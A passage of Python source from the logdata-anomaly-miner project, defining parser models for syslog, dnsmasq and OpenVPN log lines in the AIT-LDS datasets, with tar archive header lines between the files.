SequenceModelElement("uid", [ FixedDataModelElement("uid_str", b" by (uid="), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("brack_str", b")") ]) ) ]), SequenceModelElement("pidfile", [ FixedDataModelElement("str", b"(CRON) INFO (pidfile fd = "), DecimalIntegerValueModelElement("fd"), FixedDataModelElement("bracket", b")") ]), FixedDataModelElement("str", b"(CRON) info (No MTA installed, discarding output)"), FixedDataModelElement("reboot_jobs", b"(CRON) INFO (Running @reboot jobs)") ]) ]), SequenceModelElement("crontab", [ FixedDataModelElement("crontab_str", b" crontab["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), FirstMatchModelElement("crontab", [ SequenceModelElement("command", [ FixedDataModelElement("bracket", b"("), DelimitedDataModelElement("user", b")"), FixedDataModelElement("bracket", b") "), FixedWordlistDataModelElement("command", [b"REPLACE", b"LIST"]), FixedDataModelElement("bracket", b" ("), DelimitedDataModelElement("user", b")"), FixedDataModelElement("bracket", b")") ]), FixedDataModelElement("str", b"(CRON) info (No MTA installed, discarding output)"), FixedDataModelElement("reboot_jobs", b"(CRON) INFO (Running @reboot jobs)") ]) ]), SequenceModelElement("sudo", [ FixedDataModelElement("cron_str", b" sudo: "), AnyByteDataModelElement("msg") ]), SequenceModelElement("auth", [ # This only occurs in auth.log FixedDataModelElement("auth_str", b" auth: "), DelimitedDataModelElement("pam", b"("), FixedDataModelElement("brack_str", b"("), DelimitedDataModelElement("name", b")"), FixedDataModelElement("session_str", b"): authentication failure; logname="), OptionalMatchModelElement( "logname", DelimitedDataModelElement("logname", b" ") ), FixedDataModelElement("uid_str", b" uid="), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("euid_str", b" euid="), DecimalIntegerValueModelElement("euid"), FixedDataModelElement("tty_str", b" tty="), DelimitedDataModelElement("tty", b" "), FixedDataModelElement("ruser_str", b" ruser="), DelimitedDataModelElement("ruser", b" "), FixedDataModelElement("rhost_str", b" rhost="), IpAddressDataModelElement("rhost"), OptionalMatchModelElement( "user", SequenceModelElement("user", [ FixedDataModelElement("user_str", b" user="), VariableByteDataModelElement("user", alphabet) ]) ) ]), SequenceModelElement("systemd", [ FixedDataModelElement("systemd_str", b" systemd["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("systemd2", [ FixedDataModelElement("systemd_str", b" systemd: "), DelimitedDataModelElement("pam", b"("), FixedDataModelElement("brack_str", b"("), DelimitedDataModelElement("name", b")"), FixedDataModelElement("session_str", b"): session "), FixedWordlistDataModelElement("status", [b"opened", b"closed"]), FixedDataModelElement("user_str", b" for user "), VariableByteDataModelElement("user", alphabet), OptionalMatchModelElement( "uid", SequenceModelElement("uid", [ FixedDataModelElement("uid_str", b" by (uid="), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("brack_str", b")") ]) ) ]), SequenceModelElement("systemd-modules-load", [ FixedDataModelElement("systemd_str", b" systemd-modules-load["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), FixedDataModelElement("inserted", b"Inserted module '"), DelimitedDataModelElement("module", b"'"), FixedDataModelElement("apo", b"'") ]), SequenceModelElement("systemd-networkd-wait-online", [ FixedDataModelElement("systemd_str", b" systemd-networkd-wait-online["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), FixedWordlistDataModelElement("inserted", [b"managing", b"ignoring"]), FixedDataModelElement("sp", b": "), AnyByteDataModelElement("interface") ]), SequenceModelElement("systemd-fsck", [ FixedDataModelElement("systemd_str", b" systemd-fsck["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("systemd-udevd", [ FixedDataModelElement("systemd_str", b" systemd-udevd["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("sshd", [ FixedDataModelElement("systemd_str", b" sshd["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str2", b"]: "), FirstMatchModelElement("fm", [ SequenceModelElement("new", [ FixedDataModelElement("brack_str", b"pam_unix("), DelimitedDataModelElement("name", b")"), FirstMatchModelElement("message", [ SequenceModelElement("session", [ FixedDataModelElement("session_str", b"): session "), FixedWordlistDataModelElement("status", [b"opened", b"closed"]), FixedDataModelElement("user_str", b" for user "), VariableByteDataModelElement("user", alphabet), OptionalMatchModelElement( "uid", SequenceModelElement("uid", [ FixedDataModelElement("uid_str", b" by (uid="), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("brack_str", b")") ]) ) ]), SequenceModelElement("session", [ FixedDataModelElement("changed_pw", b"): password changed for "), AnyByteDataModelElement("group") ]) ]) ]), SequenceModelElement("publickey", [ FixedDataModelElement("publickey_str", b"Accepted publickey for "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("space", b" from "), IpAddressDataModelElement("ip"), FixedDataModelElement("space", b" port "), DecimalIntegerValueModelElement("port"), FixedDataModelElement("rsa", b" ssh2: RSA "), AnyByteDataModelElement("rsa"), ]), SequenceModelElement("ident", [ FixedDataModelElement("ident_str", b"Did not receive identification string from "), IpAddressDataModelElement("ip"), FixedDataModelElement("space", b" port "), DecimalIntegerValueModelElement("port"), ]), SequenceModelElement("listening", [ FixedDataModelElement("listening_str", b"Server listening on "), DelimitedDataModelElement("ip", b" "), FixedDataModelElement("port_str", b" port "), DecimalIntegerValueModelElement("port"), FixedDataModelElement("dot", b"."), ]), SequenceModelElement("signal", [ FixedDataModelElement("signal_str", b"Received signal"), AnyByteDataModelElement("remainder"), ]), SequenceModelElement("rec_disconnected", [ FixedDataModelElement("rec_disconnected_str", b"Received disconnect from "), IpAddressDataModelElement("ip"), FixedDataModelElement("space", b" port "), DecimalIntegerValueModelElement("port"), AnyByteDataModelElement("remainder"), ]), SequenceModelElement("disconnected", [ FixedDataModelElement("disconnected_str", b"Disconnected from user "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("space", b" "), IpAddressDataModelElement("ip"), FixedDataModelElement("space", b" port "), DecimalIntegerValueModelElement("port"), ]), SequenceModelElement("disconnected", [ FixedDataModelElement("disconnected_str", b"Disconnected from "), OptionalMatchModelElement("user", SequenceModelElement("user", [ FixedDataModelElement("user_str", b"user "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("space", b" "), ])), IpAddressDataModelElement("ip"), FixedDataModelElement("space", b" port "), DecimalIntegerValueModelElement("port"), ]), FixedDataModelElement("timeout", b"Timeout, client not responding.") ]) ]), SequenceModelElement("su", [ FixedDataModelElement("systemd_str", b" su["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str2", b"]: "), FirstMatchModelElement("fm", [ SequenceModelElement("seq", [ FixedDataModelElement("brack_str", b"pam_unix("), DelimitedDataModelElement("name", b")"), FixedDataModelElement("session_str", b"): session "), FixedWordlistDataModelElement("status", [b"opened", b"closed"]), FixedDataModelElement("user_str", b" for user "), VariableByteDataModelElement("user", alphabet), OptionalMatchModelElement( "uid", SequenceModelElement("uid", [ FixedDataModelElement("uid_str", b" by (uid="), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("brack_str", b")") ]) ), ]), SequenceModelElement("seq", [ FixedDataModelElement("brack_str", b"Successful su for "), VariableByteDataModelElement("user", alphabet), FixedDataModelElement("by_str", b" by "), VariableByteDataModelElement("su_user", alphabet), ]), SequenceModelElement("seq2", [ FixedDataModelElement("plus", b"+"), AnyByteDataModelElement("msg") ]), ]), ]), SequenceModelElement("kernel", [ FixedDataModelElement("kernel_str", b" kernel"), OptionalMatchModelElement( "id", SequenceModelElement("id", [ FixedDataModelElement("brack_str", b"["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str2", b"]") ]) ), FixedDataModelElement("col_str", b": "), AnyByteDataModelElement("kernel_msg") ]), SequenceModelElement("augenrules", [ FixedDataModelElement("augenrules_str", b" augenrules["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("augenrules_msg") ]), SequenceModelElement("auditd", [ FixedDataModelElement("auditd_str", b" auditd["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("auditd_msg") ]), SequenceModelElement("auditd2", [ FixedDataModelElement("auditd2_str", b" auditd: "), AnyByteDataModelElement("auditd_msg") ]), SequenceModelElement("audispd", [ FixedDataModelElement("audispd_str", b" audispd: "), AnyByteDataModelElement("audispd_msg") ]), SequenceModelElement("liblogging", [ FixedDataModelElement("liblogging_str", b" liblogging-stdlog: "), AnyByteDataModelElement("liblogging_msg") ]), SequenceModelElement("os_prober", [ FixedDataModelElement("os_prober_str", b" os-prober: "), AnyByteDataModelElement("os_prober_msg") ]), SequenceModelElement("macosx_prober", [ FixedDataModelElement("macosx_prober_str", b" macosx-prober: "), AnyByteDataModelElement("macosx_prober_msg") ]), SequenceModelElement("haiku", [ FixedDataModelElement("haiku_str", b" 83haiku: "), AnyByteDataModelElement("haiku_msg") ]), SequenceModelElement("efi", [ FixedDataModelElement("efi_str", b" 05efi: "), AnyByteDataModelElement("efi_msg") ]), SequenceModelElement("freedos", [ FixedDataModelElement("freedos_str", b" 10freedos: "), AnyByteDataModelElement("freedos_msg") ]), SequenceModelElement("qnx", [ FixedDataModelElement("qnx_str", b" 10qnx: "), AnyByteDataModelElement("qnx_msg") ]), SequenceModelElement("microsoft", [ FixedDataModelElement("microsoft_str", b" 20microsoft: "), AnyByteDataModelElement("microsoft_msg") ]), SequenceModelElement("utility", [ FixedDataModelElement("utility_str", b" 30utility: "), AnyByteDataModelElement("utility_msg") ]), SequenceModelElement("mounted_tests", [ FixedDataModelElement("mounted_tests_str", b" 50mounted-tests: "), AnyByteDataModelElement("mounted_tests_msg") ]), SequenceModelElement("rsyslogd", [ FixedDataModelElement("rsyslogd_str", b" rsyslogd: "), AnyByteDataModelElement("rsyslogd_msg") ]), SequenceModelElement("timesyncd", [ FixedDataModelElement("timesyncd_str", b" systemd-timesyncd["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("timesyncd_msg") ]), SequenceModelElement("logind", [ FixedDataModelElement("logind_str", b" systemd-logind["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]: "), FirstMatchModelElement("fm", [ SequenceModelElement("new", [ FixedDataModelElement("new_str", b"New session "), DelimitedDataModelElement("session", b" "), FixedDataModelElement("str", b" of user"), AnyByteDataModelElement("user"), ]), SequenceModelElement("removed", [ FixedDataModelElement("removed_str", b"Removed session "), DecimalIntegerValueModelElement("session"), FixedDataModelElement("dot", b"."), ]), SequenceModelElement("system_buttons", [ FixedDataModelElement("watching", b"Watching system buttons on /dev/input/event"), AnyByteDataModelElement("event_type") ]), FixedDataModelElement("new_seat", b"New seat seat0.") ])]), SequenceModelElement("grub", [ FixedDataModelElement("grub_str", b" grub-common["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]:"), AnyByteDataModelElement("grub_msg") ]), SequenceModelElement("polkitd", [ FixedDataModelElement("polkitd_str", b" polkitd["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]:"), AnyByteDataModelElement("polkitd_msg") ]), SequenceModelElement("dbus", [ FixedDataModelElement("dbus_str", b" dbus-daemon["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]:"), AnyByteDataModelElement("dbus_msg") ]), SequenceModelElement("hostnamed", [ FixedDataModelElement("hostnamed_str", b" systemd-hostnamed["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]:"), AnyByteDataModelElement("hostnamed_msg") ]), SequenceModelElement("apport", [ FixedDataModelElement("apport_str", b" apport["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]:"), AnyByteDataModelElement("apport_msg") ]), SequenceModelElement("resolved", [ FixedDataModelElement("resolved_str", b" systemd-resolved["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("resolved_msg") ]), SequenceModelElement("networkd", [ FixedDataModelElement("networkd_str", b" systemd-networkd["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("networkd_msg") ]), SequenceModelElement("networkd-dispatcher", [ FixedDataModelElement("networkd_str", b" networkd-dispatcher["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]: "), FixedDataModelElement("no_valid_path", b"No valid path found for "), AnyByteDataModelElement("interface") ]), SequenceModelElement("motd", [ FixedDataModelElement("motd_str", b" 50-motd-news["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("motd_msg") ]), SequenceModelElement("freshclam", [ FixedDataModelElement("freshclam_str", b" freshclam["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("freshclam_msg") ]), SequenceModelElement("dhclient", [ FixedDataModelElement("dhclient_str", b" dhclient["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]: "), OptionalMatchModelElement("opt", FirstMatchModelElement("dhclient", [ SequenceModelElement("dhcprequest", [ FixedDataModelElement("dhcprequest_str", b"DHCPREQUEST of "), IpAddressDataModelElement("src_ip"), FixedDataModelElement("on_str", b" on "), DelimitedDataModelElement("network_interface", b" "), FixedDataModelElement("to_str", b" to "), IpAddressDataModelElement("dst_ip"), FixedDataModelElement("port_str", b" port "), DecimalIntegerValueModelElement("port"), OptionalMatchModelElement("xid", SequenceModelElement("xid", [ FixedDataModelElement("xid", b" (xid=0x"), HexStringModelElement("hex"), FixedDataModelElement("bracket", b")") ])) ]), SequenceModelElement("dhcpack", [ FixedDataModelElement("dhcpack_str", b"DHCPACK of "), IpAddressDataModelElement("dst_ip"), FixedDataModelElement("on_str", b" from "), IpAddressDataModelElement("src_ip") ]), SequenceModelElement("bound", [ FixedDataModelElement("bound_str", b"bound to "), IpAddressDataModelElement("ip"), FixedDataModelElement("renewal_str", b" -- renewal in "), DecimalIntegerValueModelElement("seconds"), FixedDataModelElement("seconds_str", b" seconds.") ]), AnyByteDataModelElement("skipped_msg") ])), ]), SequenceModelElement("apparmor", [ FixedDataModelElement("apparmor_str", b" apparmor["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("snapd-apparmor", [ FixedDataModelElement("snapd-apparmor_str", b" snapd-apparmor["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("snapd", [ FixedDataModelElement("snapd_str", b" snapd["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("cloud-init", [ FixedDataModelElement("cloud-init_str", b" cloud-init"), OptionalMatchModelElement("pid", SequenceModelElement("pid", [ FixedDataModelElement("open_bracket", b"["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("close_bracket", b"]"), ])), FixedDataModelElement("colon", b": "), AnyByteDataModelElement("msg")]), SequenceModelElement("irqbalance", [ FixedDataModelElement("irqbalance_str", b" /usr/sbin/irqbalance"), AnyByteDataModelElement("msg")]), SequenceModelElement("pollinate", [ FixedDataModelElement("pollinate_str", b" pollinate["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("lxcfs", [ FixedDataModelElement("lxcfs_str", b" lxcfs["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("accounts-daemon", [ FixedDataModelElement("accounts-daemon_str", b" accounts-daemon["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("ec2", [ FixedDataModelElement("ec2_str", b" ec2: "), OptionalMatchModelElement("opt", AnyByteDataModelElement("msg"))]), SequenceModelElement("dnsmasq", [ FixedDataModelElement("dnsmasq_str", b" dnsmasq["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("etc_maradns_mararc", [ FixedDataModelElement("etc_maradns_mararc_str", b" etc_maradns_mararc["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), OptionalMatchModelElement("opt", AnyByteDataModelElement("msg"))]), SequenceModelElement("etc_maradns_mararc-zs", [ FixedDataModelElement("etc_maradns_mararc-zs_str", b" etc_maradns_mararc-zs["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), OptionalMatchModelElement("opt", AnyByteDataModelElement("msg"))]), SequenceModelElement("ifup", [ FixedDataModelElement("ifup_str", b" ifup["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("root", [ FixedDataModelElement("root_str", b" root: "), AnyByteDataModelElement("msg")]), SequenceModelElement("ntpd", [ FixedDataModelElement("ntpd_str", b" ntpd["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("ntp", [ FixedDataModelElement("ntp_str", b" ntp["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("exim4", [ FixedDataModelElement("exim4_str", b" exim4"), OptionalMatchModelElement("opt", SequenceModelElement("pid", [ FixedDataModelElement("open_bracket", b"["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("close_bracket", b"]"), ])), FixedDataModelElement("colon_str1", b": "), AnyByteDataModelElement("msg")]), SequenceModelElement("mysqld_safe", [ FixedDataModelElement("mysqld_safe_str", b" mysqld_safe["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("mysqld", [ FixedDataModelElement("mysqld_str", b" mysqld["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("php7.0", [ FixedDataModelElement("php7.0_str", b" php7.0-"), DelimitedDataModelElement("service", b":"), FixedDataModelElement("colon", b": "), AnyByteDataModelElement("msg")]), SequenceModelElement("libapache2-mod-php7.0", [ FixedDataModelElement("libapache2-mod-php7.0_str", b" libapache2-mod-php7.0: "), AnyByteDataModelElement("msg")]), SequenceModelElement("php", [ FixedDataModelElement("php_str", b" php-"), DelimitedDataModelElement("service", b":"), FixedDataModelElement("colon", b": "), AnyByteDataModelElement("msg")]), SequenceModelElement("apache2_postinst", [ FixedDataModelElement("apache2_postinst_str", b" apache2.postinst: "), AnyByteDataModelElement("msg")]), SequenceModelElement("smbd", [ FixedDataModelElement("smbd_str", b" smbd["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("ut", [ FixedDataModelElement("ut_str", b" ut["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("apachectl", [ FixedDataModelElement("apachectl_str", b" apachectl["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), FirstMatchModelElement("fm", [ SequenceModelElement("ah00548", [ FixedDataModelElement("ah00548", b"AH00548: NameVirtualHost has no effect and will be removed in the next release "), AnyByteDataModelElement("cfg_path") ]) ]) ]) ]) ]) return model logdata-anomaly-miner-2.6.1/source/root/etc/aminer/conf-available/ait-lds2/000077500000000000000000000000001437606560100265045ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/etc/aminer/conf-available/ait-lds2/DnsParsingModel.py000066400000000000000000000112521437606560100321100ustar00rootroot00000000000000"""This module defines a generated parser model.""" from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.DecimalFloatValueModelElement import DecimalFloatValueModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement def get_model(): """Return a model to parse Syslogs from the AIT-LDS.""" alphabet = b"!'#$%&\"()*+,-./0123456789:;<>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ\\^_`abcdefghijklmnopqrstuvwxyz{|}~=[]" model = SequenceModelElement("model", [ DateTimeModelElement("time", b"%b %d %H:%M:%S ", start_year=2022), DelimitedDataModelElement("service", b"["), FixedDataModelElement("br_open", b"["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("br_close", b"]: "), FirstMatchModelElement("type", [ SequenceModelElement("query", [ FixedDataModelElement("query", b"query["), VariableByteDataModelElement("record", b"ATXPRMSV"), FixedDataModelElement("br_close", b"] "), DelimitedDataModelElement("domain", b" "), FixedDataModelElement("from", b" from "), IpAddressDataModelElement("ip") ]), SequenceModelElement("reply", [ FixedDataModelElement("reply", b"reply "), DelimitedDataModelElement("domain", b" "), FixedDataModelElement("is", b" is "), VariableByteDataModelElement("ip", alphabet) ]), SequenceModelElement("forwarded", [ FixedDataModelElement("reply", b"forwarded "), DelimitedDataModelElement("domain", b" "), FixedDataModelElement("to", b" to "), IpAddressDataModelElement("ip") ]), SequenceModelElement("nameserver", [ FixedDataModelElement("nameserver", b"nameserver "), IpAddressDataModelElement("ip"), FixedDataModelElement("refused", b" refused to do a recursive query"), ]), SequenceModelElement("nameserver", [ FixedDataModelElement("nameserver", b"using nameserver "), IpAddressDataModelElement("ip"), FixedDataModelElement("port", b"#53"), OptionalMatchModelElement("opt_domain", SequenceModelElement("for_domain", [ FixedDataModelElement("for_domain", b" for domain "), AnyByteDataModelElement("domain") ])) ]), SequenceModelElement("cached", [ FixedDataModelElement("cached", b"cached "), DelimitedDataModelElement("domain", b" "), FixedDataModelElement("is", b" is "), VariableByteDataModelElement("ip", alphabet) ]), SequenceModelElement("reducing", [ FixedDataModelElement("reducing", b"reducing DNS packet size for nameserver "), IpAddressDataModelElement("ip"), FixedDataModelElement("is", b" to "), DecimalIntegerValueModelElement("size") ]), SequenceModelElement("compile_time_options", [ FixedDataModelElement("compile_time_options", b"compile time options: "), AnyByteDataModelElement("options") ]), SequenceModelElement("version", [ FixedDataModelElement("version", b"started, version "), DecimalFloatValueModelElement("version_nr"), FixedDataModelElement("cachesize", b" cachesize "), DecimalIntegerValueModelElement("size") ]), FixedDataModelElement("read_hosts", b"read /etc/hosts - 7 addresses"), FixedDataModelElement("failed_access", b"failed to access /etc/dnsmasq.d/dnsmasq-resolv.conf: No such file or directory"), FixedDataModelElement("version.bind", b"config version.bind is "), FixedDataModelElement("sigterm", b"exiting on receipt of SIGTERM"), ]) ]) return model logdata-anomaly-miner-2.6.1/source/root/etc/aminer/conf-available/ait-lds2/OpenVpnParsingModel.py000066400000000000000000000271131437606560100327540ustar00rootroot00000000000000from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.RepeatedElementDataModelElement import RepeatedElementDataModelElement from aminer.parsing.HexStringModelElement import HexStringModelElement def get_model(): """Return a model to parse OpenVPN logs from the AIT-LDS2.""" model = SequenceModelElement("model", [ DateTimeModelElement("datetime", b"%Y-%m-%d %H:%M:%S "), OptionalMatchModelElement("user", SequenceModelElement("user", [ DelimitedDataModelElement("user", b"/"), FixedDataModelElement("slash", b"/") ])), IpAddressDataModelElement("ip"), FixedDataModelElement("colon", b":"), DecimalIntegerValueModelElement("port"), FirstMatchModelElement("fm", [ SequenceModelElement("peer_info", [ FixedDataModelElement("peer_info_str", b" peer info: IV_"), FirstMatchModelElement("fm", [ SequenceModelElement("version", [ FixedDataModelElement("version_str", b"VER="), AnyByteDataModelElement("version") ]), SequenceModelElement("platform", [ FixedDataModelElement("platform_str", b"PLAT="), AnyByteDataModelElement("platform") ]), SequenceModelElement("protocol", [ FixedDataModelElement("protocol_str", b"PROTO="), DecimalIntegerValueModelElement("protocol") ]), SequenceModelElement("lz", [ FixedWordlistDataModelElement("lz_str", [b"LZ4=", b"LZ4v2=", b"LZO="]), DecimalIntegerValueModelElement("lz") ]), SequenceModelElement("comp_stub", [ FixedWordlistDataModelElement("comp_stub_str", [b"COMP_STUB=", b"COMP_STUBv2="]), DecimalIntegerValueModelElement("protocol") ]), SequenceModelElement("tcpnl", [ FixedDataModelElement("tcpnl_str", b"TCPNL="), DecimalIntegerValueModelElement("tcpnl") ]), SequenceModelElement("ncp", [ FixedDataModelElement("ncp_str", b"NCP="), DecimalIntegerValueModelElement("ncp") ]), ]) ]), FixedDataModelElement("validating", b" Validating certificate extended key usage"), SequenceModelElement("communication", [ FixedWordlistDataModelElement("direction", [b" Outgoing Data", b" Incoming Data", b" Control"]), FixedDataModelElement("data_channel_str", b" Channel: "), AnyByteDataModelElement("msg") ]), SequenceModelElement("verify", [ FixedDataModelElement("verify_str", b" VERIFY "), FixedWordlistDataModelElement("type", [b"KU", b"EKU"]), FixedDataModelElement("ok_str", b" OK") ]), SequenceModelElement("verify", [ FixedDataModelElement("verify_str", b" VERIFY OK: "), RepeatedElementDataModelElement("cert_data", SequenceModelElement("seq", [ FixedWordlistDataModelElement("attribute", [b"depth", b"ST", b"L", b"O", b"CN", b"C", b"emailAddress"]), FixedDataModelElement("equals_sign", b"="), FirstMatchModelElement("fm", [ SequenceModelElement("data", [ DelimitedDataModelElement("data", b","), FixedDataModelElement("sp", b", ") ]), AnyByteDataModelElement("data") ]), ])) ]), SequenceModelElement("tls", [ FixedDataModelElement("tls_str", b" TLS: "), FirstMatchModelElement("fm", [ SequenceModelElement("soft_reset", [ FixedDataModelElement("soft_reset_str", b"soft reset sec="), DecimalIntegerValueModelElement("sec"), FixedDataModelElement("slash", b"/"), DecimalIntegerValueModelElement("sec"), FixedDataModelElement("bytes_str", b" bytes="), DecimalIntegerValueModelElement("bytes"), FixedDataModelElement("slash", b"/"), DecimalIntegerValueModelElement("bytes", value_sign_type=DecimalIntegerValueModelElement.SIGN_TYPE_OPTIONAL), FixedDataModelElement("pkts_str", b" pkts="), DecimalIntegerValueModelElement("pkts"), FixedDataModelElement("slash", b"/"), DecimalIntegerValueModelElement("pkts") ]), SequenceModelElement("initial_packet", [ FixedDataModelElement("initial_packet_str", b"Initial packet from [AF_INET]"), IpAddressDataModelElement("from_ip"), FixedDataModelElement("colon", b":"), DecimalIntegerValueModelElement("port"), FixedDataModelElement("sid_str", b", sid="), HexStringModelElement("sid1"), FixedDataModelElement("sp", b" "), HexStringModelElement("sid2") ]), SequenceModelElement("move_session", [ FixedDataModelElement("move_session_str", b"move_session: dest="), DelimitedDataModelElement("dest", b" "), FixedDataModelElement("src_str", b" src="), DelimitedDataModelElement("src", b" "), FixedDataModelElement("reinit_src_str", b" reinit_src="), DecimalIntegerValueModelElement("reinit_src") ]) ]) ]), SequenceModelElement("tls_error", [ FixedDataModelElement("error_str", b" TLS Error: "), FirstMatchModelElement("fm", [ FixedDataModelElement("negotiation_failed", b"TLS key negotiation failed to occur within 60 seconds (check your network connectivity)"), FixedDataModelElement("handshake_failed", b"TLS handshake failed") ]) ]), SequenceModelElement("multi", [ FixedDataModelElement("multi_str", b" MULTI: "), FirstMatchModelElement("fm", [ SequenceModelElement("learn", [ FixedDataModelElement("learn_str", b"Learn: "), IpAddressDataModelElement("ip1"), FixedDataModelElement("arrow", b" -> "), DelimitedDataModelElement("name", b"/"), FixedDataModelElement("slash", b"/"), IpAddressDataModelElement("ip2"), FixedDataModelElement("colon", b":"), DecimalIntegerValueModelElement("port") ]), SequenceModelElement("primary", [ FixedDataModelElement("primary_str", b"primary virtual IP for "), DelimitedDataModelElement("name", b"/"), FixedDataModelElement("slash", b"/"), IpAddressDataModelElement("ip1"), FixedDataModelElement("colon", b":"), DecimalIntegerValueModelElement("port"), FixedDataModelElement("colon", b": "), IpAddressDataModelElement("ip2") ]), ]) ]), SequenceModelElement("multi_sva", [ FixedDataModelElement("multi_str", b" MULTI_sva: "), FirstMatchModelElement("fm", [ SequenceModelElement("pool_returned", [ FixedDataModelElement("pool_returned_str", b"pool returned IPv4="), IpAddressDataModelElement("ip"), FixedDataModelElement("ipv6_str", b", IPv6="), FirstMatchModelElement("fm", [ FixedDataModelElement("not_enabled", b"(Not enabled)"), IpAddressDataModelElement("ipv6", ipv6=True) ]) ]), SequenceModelElement("primary", [ FixedDataModelElement("primary_str", b"primary virtual IP for "), DelimitedDataModelElement("name", b"/"), FixedDataModelElement("slash", b"/"), IpAddressDataModelElement("ip1"), FixedDataModelElement("colon", b":"), DecimalIntegerValueModelElement("port"), 